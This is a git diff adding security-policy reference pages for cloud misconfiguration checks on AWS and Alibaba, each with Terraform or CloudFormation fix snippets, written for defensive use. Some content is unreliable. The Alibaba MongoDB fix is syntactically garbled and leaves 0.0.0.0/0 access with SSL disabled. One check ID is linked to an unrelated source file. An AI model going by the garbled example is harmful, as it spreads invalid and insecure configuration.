++     return_connection_password_encrypted = true
++   }
++   encryption_at_rest {
++     catalog_encryption_mode = "SSE-KMS"
++     sse_aws_kms_key_id      = aws_kms_key.glue.arn
++   }
++ }
+  ...
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource* AWS::Glue::DataCatalogEncryptionSettings
+* *Arguments* Properties.DataCatalogEncryptionSettings
+
+
+[source,yaml]
+----
+Resources:
+  Example:
+    Type: 'AWS::Glue::DataCatalogEncryptionSettings'
+    Properties:
+      ...
+      DataCatalogEncryptionSettings:
+        ConnectionPasswordEncryption:
+          ...
++         ReturnConnectionPasswordEncrypted: True
+        EncryptionAtRest:
+          ...
++         CatalogEncryptionMode: "SSE-KMS"
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-38.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-38.adoc
new file mode 100644
index 000000000..0962dc95b
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-38.adoc
@@ -0,0 +1,90 @@
+== Not all data stored in Aurora is securely encrypted at rest
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 98037c30-939b-474b-aa61-b1f8ef9bc6a2
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AuroraEncryption.py[CKV_AWS_96]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+This policy examines the resource *aws_rds_cluster* to check that encryption is set up.
+The property *storage_encrypted* is examined.
+
+////
+=== Fix - Runtime
+
+
+AWS Console
+
+
+TBA
+
+
+CLI Command
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_rds_cluster
+* *Arguments:* storage_encrypted
+
+
+[source,go]
+----
+resource "aws_rds_cluster" "example" {
+  ...
+  cluster_identifier = "aurora-cluster-demo"
++ storage_encrypted  = true
+  ...
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::RDS::DBCluster
+* *Arguments:* Properties.StorageEncrypted
+
+
+[source,yaml]
+----
+Resources:
+  Aurora:
+    Type: 'AWS::RDS::DBCluster'
+    Properties:
+      ...
+      Engine: 'aurora'
++     StorageEncrypted: true
+      ...
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-39.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-39.adoc
new file mode 100644
index 000000000..10666ca97
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-39.adoc
@@ -0,0 +1,88 @@
+== EFS volumes in ECS task definitions do not have encryption in transit enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 880174a9-71c2-499e-a1a1-09f88106f7dc
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py[CKV_AWS_97]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+This check examines ECS task definitions and verifies that any attached EFS volume has encryption in transit enabled.
+
+////
+=== Fix - Runtime
+
+
+AWS Console
+
+
+TBA
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_ecs_task_definition
+* *Arguments:* efs_volume_configuration/transit_encryption needs to be set to ENABLED if there is an attached EFS volume.
+
+
+[source,go]
+----
+resource "aws_ecs_task_definition" "example" {
+  ...
+  family = "service"
+  volume {
+    ...
+    efs_volume_configuration {
+      ...
++     transit_encryption = "ENABLED"
+    }
+  }
+  ...
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::ECS::TaskDefinition
+* *Arguments:* Properties.Volumes.EFSVolumeConfiguration.TransitEncryption needs to be set to ENABLED if there is an attached EFS volume.
+
+
+[source,yaml]
+----
+Resources:
+  TaskDefinition:
+    Type: AWS::ECS::TaskDefinition
+    Properties:
+      ...
+      Volumes:
+        - ...
+          EFSVolumeConfiguration:
+            ...
++           TransitEncryption: "ENABLED"
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-40.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-40.adoc
new file mode 100644
index 000000000..61dc3ea93
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-40.adoc
@@ -0,0 +1,74 @@
+== AWS SageMaker endpoint not configured with data encryption at rest using KMS key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f63b99e7-f844-4873-8292-61c7159f73d1
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py[CKV_AWS_98]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This is a straightforward check to ensure data encryption at rest for SageMaker endpoint configurations; it verifies that the configuration is encrypted with a customer managed key (CMK).
+
+////
+=== Fix - Runtime
+
+
+AWS Console
+
+
+There is no current way of enabling encryption on an existing notebook; it will need to be recreated.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_sagemaker_endpoint_configuration
+* *Arguments:* kms_key_arn - specifying a KMS key will ensure data encryption.
+This modification will result in the resource being recreated.
+
+
+[source,go]
+----
+resource "aws_sagemaker_endpoint_configuration" "example" {
+  ...
+  name = "my-endpoint-config"
++ kms_key_arn = aws_kms_key.examplea.arn
+  production_variants {
+    variant_name           = "variant-1"
+    model_name             = aws_sagemaker_model.examplea.name
+    initial_instance_count = 1
+    instance_type          = "ml.t2.medium"
+  }
+  ...
+}
+----
+
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-41.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-41.adoc
new file mode 100644
index 000000000..34d6cc930
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-41.adoc
@@ -0,0 +1,105 @@
+== AWS Glue security configuration encryption is not enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 348170ea-b358-49bd-adf1-f30f5665b9ae
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py[CKV_AWS_99]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Ensure that AWS Glue has encryption enabled.
+AWS Glue has three possible components that could be encrypted: CloudWatch, job bookmarks and S3 buckets.
+This check ensures that each is set correctly.
+
+////
+=== Fix - Runtime
+
+
+AWS Console
+
+
+TBA
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_glue_security_configuration
+* *Arguments:* encryption_configuration, job_bookmarks_encryption, s3_encryption
+
+
+[source,go]
+----
+resource "aws_glue_security_configuration" "test" {
+  name = "example"
+  ...
++ encryption_configuration {
++   cloudwatch_encryption {
++     cloudwatch_encryption_mode = "SSE-KMS"
++     kms_key_arn                = aws_kms_key.example.arn
++   }
+
++   job_bookmarks_encryption {
++     job_bookmarks_encryption_mode = "CSE-KMS"
++     kms_key_arn                   = aws_kms_key.example.arn
++   }
+
++   s3_encryption {
++     kms_key_arn        = aws_kms_key.example.arn
++     s3_encryption_mode = "SSE-KMS"
++   }
++ }
+}
+----
+
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::Glue::SecurityConfiguration
+* *Arguments:* Properties.EncryptionConfiguration
+
+
+[source,yaml]
+----
+Resources:
+  Resource0:
+    Type: AWS::Glue::SecurityConfiguration
+    Properties:
+      ...
+      EncryptionConfiguration:
+        CloudWatchEncryption:
++         CloudWatchEncryptionMode: SSE-KMS #any value but 'DISABLED'
+          ...
+        JobBookmarksEncryption:
++         JobBookmarksEncryptionMode: CSE-KMS #any value but 'DISABLED'
+          ...
+        S3Encryptions:
++         S3EncryptionMode: SSE-KMS #any value but 'DISABLED'
+          ...
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-42.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-42.adoc
new file mode 100644
index 000000000..c28a37f8c
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-42.adoc
@@ -0,0 +1,78 @@
+== Neptune cluster instance is publicly available
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 60b324fc-fee3-4db3-8668-c23832ac5b7c
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py[CKV_AWS_102]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Amazon Neptune is a graph database service built on a high-performance graph database engine.
+Neptune supports the popular graph query languages Apache TinkerPop Gremlin and W3C's SPARQL.
+Neptune also gives you the ability to create snapshots of your databases, which you can use later to restore a database.
+You can share a snapshot with a different Amazon Web Services account, and the owner of the recipient account can use your snapshot to restore a DB that contains your data.
+You can even choose to make your snapshots public -- that is, anybody can restore a DB containing your data.
+This check ensures that your database resource is not publicly available, which is the resource's default behaviour.
+For more information, see https://docs.aws.amazon.com/neptune/latest/userguide/security-vpc.html.
+
+////
+=== Fix - Runtime
+
+
+AWS Console
+
+
+First find your Neptune instance ID with the AWS command line:
+----
+aws neptune describe-db-instances
+----
+Once you have your instance ID you can unset its public status with:
+----
+aws neptune modify-db-instance --db-instance-identifier <your-db-identifier> --no-publicly-accessible
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_neptune_cluster_instance
+* *Arguments:* publicly_accessible - defaults to false; the check ensures it is either unset or set to false.
+
+
+[source,go]
+----
+resource "aws_neptune_cluster_instance" "example" {
+  count              = 2
+  cluster_identifier = aws_neptune_cluster.default.id
+  engine             = "neptune"
+  instance_class     = "db.r4.large"
+  apply_immediately  = true
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-43.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-43.adoc
new file mode 100644
index 000000000..29fb47985
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-43.adoc
@@ -0,0 +1,104 @@
+== AWS Load Balancer is not using TLS 1.2
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 72141d35-c371-4aa6-ae6d-1a37dd26d59d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py[CKV_AWS_103]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+A listener in an AWS Load Balancer is a process that checks for connection requests.
+Users can define a listener when creating a load balancer, and add listeners to the load balancer at any time.
+The HTTPS listener enables traffic encryption between your load balancer and the clients that initiate SSL or TLS sessions.
+
+////
+=== Fix - Runtime
+
+
+AWS Console
+
+
+
+. Go to the Amazon EC2 console at https://console.aws.amazon.com/ec2/.
+
+. On the navigation pane, under LOAD BALANCING, select Load Balancers.
+
+. Select the load balancer and choose Listeners.
+
+. Select the check box for the TLS listener and choose Edit.
+
+. For Security policy, choose a security policy.
+
+
+CLI Command
+
+
+
+
+[source,text]
+----
+modify-listener
+--listener-arn <value>
+[--port <value>]
+[--protocol <value>]
+[--ssl-policy <value>]
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_lb_listener
+* *Attribute:* protocol - (Optional)
+
+The protocol for connections from clients to the load balancer.
+For Application Load Balancers, valid values are HTTP and HTTPS, with a default of HTTP.
+For Network Load Balancers, valid values are TCP, TLS, UDP, and TCP_UDP.
+Not valid to use UDP or TCP_UDP if dual-stack mode is enabled.
+Not valid for Gateway Load Balancers.
+
+
+[source,go]
+----
+resource "aws_lb_listener" "front_end" {
+  load_balancer_arn = aws_lb.front_end.arn
+  port              = "443"
+  protocol          = "HTTPS"
+
+  ssl_policy      = "ELBSecurityPolicy-TLS13-1-2-2021-06"
+  certificate_arn = "arn:aws:acm:eu-west-2:999999999:certificate/77777777-5d4a-457f-8888-02550c8c9244"
+
+  default_action {
+    type             = "forward"
+    target_group_arn = aws_lb_target_group.front_end.arn
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-97.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-97.adoc
new file mode 100644
index 000000000..a2b55b12f
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-97.adoc
@@ -0,0 +1,59 @@
+== AWS Kinesis Video Stream not encrypted using Customer Managed Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| c62e89dd-600d-48d3-afc0-0de3510534b3
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py[CKV_AWS_177]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This is a simple check to ensure that the Kinesis Video Stream is using AWS Key Management Service (KMS) to encrypt its contents.
+To resolve this, add the ARN of your KMS key when creating the stream.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_kinesis_video_stream
+* *Attribute:* kms_key_id - (Optional)
+
+The ID of the AWS Key Management Service (AWS KMS) key that you want Kinesis Video Streams to use to encrypt stream data.
+If no key ID is specified, the default Kinesis Video-managed key (aws/kinesisvideo) is used.
+
+
+[source,go]
+----
+resource "aws_kinesis_video_stream" "default" {
+  name                    = "terraform-kinesis-video-stream"
+  data_retention_in_hours = 1
+  device_name             = "kinesis-video-device-name"
+  media_type              = "video/h264"
+
+  kms_key_id = aws_kms_key.example.arn
+  tags = {
+    Name = "terraform-kinesis-video-stream"
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-99.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-99.adoc
new file mode 100644
index 000000000..c56fc8e84
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-99.adoc
@@ -0,0 +1,56 @@
+== AWS FSX Windows filesystem not encrypted using Customer Managed Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 4a813b6d-315e-4a4c-bef8-6266b8c8290f
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py[CKV_AWS_179]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This is a simple check to ensure that the FSX Windows file system is using AWS Key Management Service (KMS) to encrypt its contents.
+To resolve this, add the ARN of your KMS key when creating the file system.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_fsx_windows_file_system
+* *Attribute*: kms_key_id
+
+
+[source,go]
+----
+resource "aws_fsx_windows_file_system" "example" {
+  active_directory_id = aws_directory_service_directory.example.id
+  kms_key_id          = aws_kms_key.example.arn
+  storage_capacity    = 300
+  subnet_ids          = [aws_subnet.example.id]
+  throughput_capacity = 1024
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-logging-32.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-logging-32.adoc
new file mode 100644
index 000000000..ab821158a
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-logging-32.adoc
@@ -0,0 +1,69 @@
+== Postgres RDS does not have Query Logging enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 815e430a-9f43-4d25-b6ef-d93ea5239a1d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml[CKV2_AWS_27]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This check ensures that query logging is enabled for your PostgreSQL database instance.
+An instance needs a non-default parameter group with two parameters set: _log_statement_ and _log_min_duration_statement_, which need to be set to _all_ and _1_ respectively to produce sufficient logs.
+NOTE: Query logging can expose secrets (including passwords) from your queries; restrict access to the logs and encrypt them to mitigate this.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+You will need an aws_db_instance resource whose parameter_group_name attribute refers to your aws_db_parameter_group.
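+For example, the linkage can look like this (resource and identifier names here are illustrative, not taken from this policy's source):
+
+[source,go]
+----
+resource "aws_db_instance" "example" {
+  identifier        = "example-postgres"
+  engine            = "postgres"
+  instance_class    = "db.t3.micro"
+  allocated_storage = 20
+  username          = "exampleuser"
+  password          = "change-me" # placeholder; supply securely in practice
+
+  # Attach the non-default parameter group that carries the logging parameters
+  parameter_group_name = aws_db_parameter_group.example.name
+}
+----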
+
+With that in place, the following parameters need to be set:
+
+
+[source,go]
+----
+resource "aws_db_parameter_group" "example" {
+  name   = "rds-cluster-pg"
+  family = "postgres10"
+
++ parameter {
++   name  = "log_statement"
++   value = "all"
++ }
+
++ parameter {
++   name  = "log_min_duration_statement"
++   value = "1"
++ }
+}
+----
+
+For more details, see the AWS docs: https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_LogAccess.Concepts.PostgreSQL.html
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-networking-62.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-networking-62.adoc
new file mode 100644
index 000000000..46b519d19
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-networking-62.adoc
@@ -0,0 +1,77 @@
+== Deletion protection disabled for load balancer
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 9be5d82a-e667-49a5-bb21-c36ebec22f66
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py[CKV_AWS_113]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies Elastic Load Balancers v2 (ELBv2) that are configured with the deletion protection feature disabled.
+Enabling deletion protection for these ELBs prevents irreversible data loss resulting from accidental or malicious operations.
+For more details, see https://docs.aws.amazon.com/elasticloadbalancing/latest/application/application-load-balancers.html#deletion-protection
+
+////
+=== Fix - Runtime
+
+
+AWS Console
+
+
+
+. Log in to the AWS console
+
+. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
+
+. Go to the EC2 Dashboard, and select 'Load Balancers'
+
+. Click on the reported Load Balancer
+
+. On the Description tab, choose 'Edit attributes'
+
+. On the Edit load balancer attributes page, select 'Enable' for 'Delete Protection'
+
+. Click on 'Save' to save your changes
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_lb
+* *Arguments:* enable_deletion_protection
+
+
+[source,go]
+----
+resource "aws_lb" "test_success" {
+  ...
++ enable_deletion_protection = true
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-storage-1.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-storage-1.adoc
new file mode 100644
index 000000000..89e437a23
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-storage-1.adoc
@@ -0,0 +1,84 @@
+== AWS QLDB ledger deletion protection is disabled
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 7b025835-c70a-432b-8ee3-d791db453691
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py[CKV_AWS_172]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+Amazon Quantum Ledger Database (Amazon QLDB) is a fully managed ledger database for cryptographically verifiable transaction logging.
+You can use the QLDB API or the AWS Command Line Interface (AWS CLI) to create, update, and delete ledgers in Amazon QLDB.
+You can also list all the ledgers in your account, or get information about a specific ledger.
+Deletion protection is enabled by default.
+To successfully delete this resource via Terraform, deletion_protection = false must be applied before attempting deletion.
+In CloudFormation, the DeletionProtection flag prevents a ledger from being deleted by any user.
+If not provided on ledger creation, this feature is enabled (true) by default.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_qldb_ledger
+* *Arguments:* deletion_protection
+
+
+[source,go]
+----
+resource "aws_qldb_ledger" "sample-ledger" {
+  name             = "sample-ledger"
+  permissions_mode = "STANDARD"
++ deletion_protection = true
+}
+----
+
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::QLDB::Ledger
+* *Arguments:* DeletionProtection
+
+
+[source,yaml]
+----
+Type: AWS::QLDB::Ledger
+Properties:
++ DeletionProtection: true
+  KmsKey: String
+  Name: String
+  PermissionsMode: String
+  Tags:
+    - Tag
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc
new file mode 100644
index 000000000..7e50d0c8a
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc
@@ -0,0 +1,66 @@
+== Alibaba Cloud MongoDB is not deployed inside a VPC
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 8f96497a-ecbd-4ee2-a77b-4495a21d521e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py[CKV_ALI_41]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Deploying your MongoDB database inside a VPC helps protect your data from unauthorized access or tampering by isolating the database from the public internet.
+ +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_mongodb_instance" "pass" { + engine_version = "3.4" + db_instance_class = "dds.mongo.mid" + db_instance_storage = 10 + vswitch_id = alicloud_vswitch.ditch.id + security_ip_list = ["0.0.0.0/0","10.168.1.12", "100.69.7.112"] + kms_encryption_context= { + + } + + # tde_status = "Disabled" + ssl_action = "Close" + # not set + network_type = "VPC" +} + + +resource "alicloud_vswitch" "ditch" { + vpc_id = "anyoldtripe" + cidr_block = "0.0.0.0/0" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-api-gateway-caching-is-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-api-gateway-caching-is-enabled.adoc new file mode 100644 index 000000000..ab11c103e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-api-gateway-caching-is-enabled.adoc @@ -0,0 +1,94 @@ +== AWS API Gateway caching is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 09e59cb9-5aaf-489a-a20a-9b6a4246c0ca + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py[CKV_AWS_120] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,CloudFormation + +|=== + + + +=== Description + + +This checks that all methods in an Amazon API Gateway stage to ensure that they have caching enabled. +As AWS puts it "With caching, you can reduce the number of calls made to your endpoint and also improve the latency of requests to your API" and so if you need to minimise those, this will help. +See the AWS docs for more information: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-caching.html + +//// +=== Fix - Runtime +To configure API caching for a given stage: +* Go to the API Gateway console. +* Choose the API. +* Choose Stages. 
+* In the Stages list for the API, choose the stage.
+* Choose the Settings tab.
+* Choose Enable API cache.
+Wait for the cache creation to complete.
+////
+
+=== Fix - Buildtime
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::ApiGateway::Stage
+* *Arguments:* CacheClusterEnabled
+
+
+[source,yaml]
+----
+AWSTemplateFormatVersion: "2010-09-09"
+Resources:
+  CacheTrue:
+    Type: AWS::ApiGateway::Stage
+    Properties:
+      StageName: test
+      Description: test
+      RestApiId: test
+      DeploymentId: test
++     CacheClusterEnabled: true
+----
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_api_gateway_stage
+* *Arguments:* cache_cluster_enabled
+
+
+[source,go]
+----
+resource "aws_api_gateway_stage" "examplea" {
+  deployment_id         = aws_api_gateway_deployment.stage_api.id
+  rest_api_id           = aws_api_gateway_rest_api.api.id
+  stage_name            = "example"
+  cache_cluster_enabled = true
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-acm-certificates-has-logging-preference.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-acm-certificates-has-logging-preference.adoc
new file mode 100644
index 000000000..a97ca043b
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-acm-certificates-has-logging-preference.adoc
@@ -0,0 +1,102 @@
+== AWS ACM certificates do not have a logging preference
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 621fd08f-2fd2-4607-8203-a1f8c47477c9
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py[CKV_AWS_234]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+To guard against SSL/TLS certificates that are issued by mistake or by a compromised CA, some browsers like Chrome require that public certificates issued for a domain be recorded in a certificate transparency log.
+The domain name is recorded, but not the private key.
+Certificates that are not logged typically generate an error in the browser.
+
+////
+=== Fix - Runtime
+
+
+Console
+
+
+It is not possible to adjust transparency logging via the console.
+
+
+CLI
+
+
+
+
+[source,shell]
+----
+aws acm request-certificate \
+  --domain-name example.com \
+  --validation-method DNS \
+  --options CertificateTransparencyLoggingPreference=ENABLED
+----
+////
+
+=== Fix - Buildtime
+
+
+*CloudFormation*
+
+
+
+
+[source,yaml]
+----
+Resources:
+  Example:
+    Type: "AWS::CertificateManager::Certificate"
+    Properties:
+      DomainName: example.com
+      ValidationMethod: DNS
++     CertificateTransparencyLoggingPreference: ENABLED
+----
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "aws_acm_certificate" "example" {
+  domain_name       = "example.com"
+  validation_method = "DNS"
+
++ options {
++   certificate_transparency_logging_preference = "ENABLED"
++ }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-all-data-stored-in-the-elasticsearch-domain-is-encrypted-using-a-customer-managed-key-cmk.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-all-data-stored-in-the-elasticsearch-domain-is-encrypted-using-a-customer-managed-key-cmk.adoc
new file mode 100644
index 000000000..db0ad4fd4
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-all-data-stored-in-the-elasticsearch-domain-is-encrypted-using-a-customer-managed-key-cmk.adoc
@@ -0,0 +1,60 @@
+== AWS all data stored in the Elasticsearch domain is not encrypted using a Customer Managed Key (CMK)
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1fc1f970-29da-44e2-8b62-d668eb03671d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py[CKV_AWS_247]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies Elasticsearch domains that are encrypted with default KMS keys rather than with keys managed by the customer.
+It is a best practice to use customer managed KMS keys to encrypt your Elasticsearch domain data.
+It gives you full control over the encrypted data.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "aws_elasticsearch_domain" "pass" {
+  domain_name = "example"
+
+  cluster_config {
+    instance_type = "r5.large.elasticsearch"
+  }
+
+  encrypt_at_rest {
+    kms_key_id = aws_kms_key.example.arn
+  }
+}
+----
\ No newline at end of file
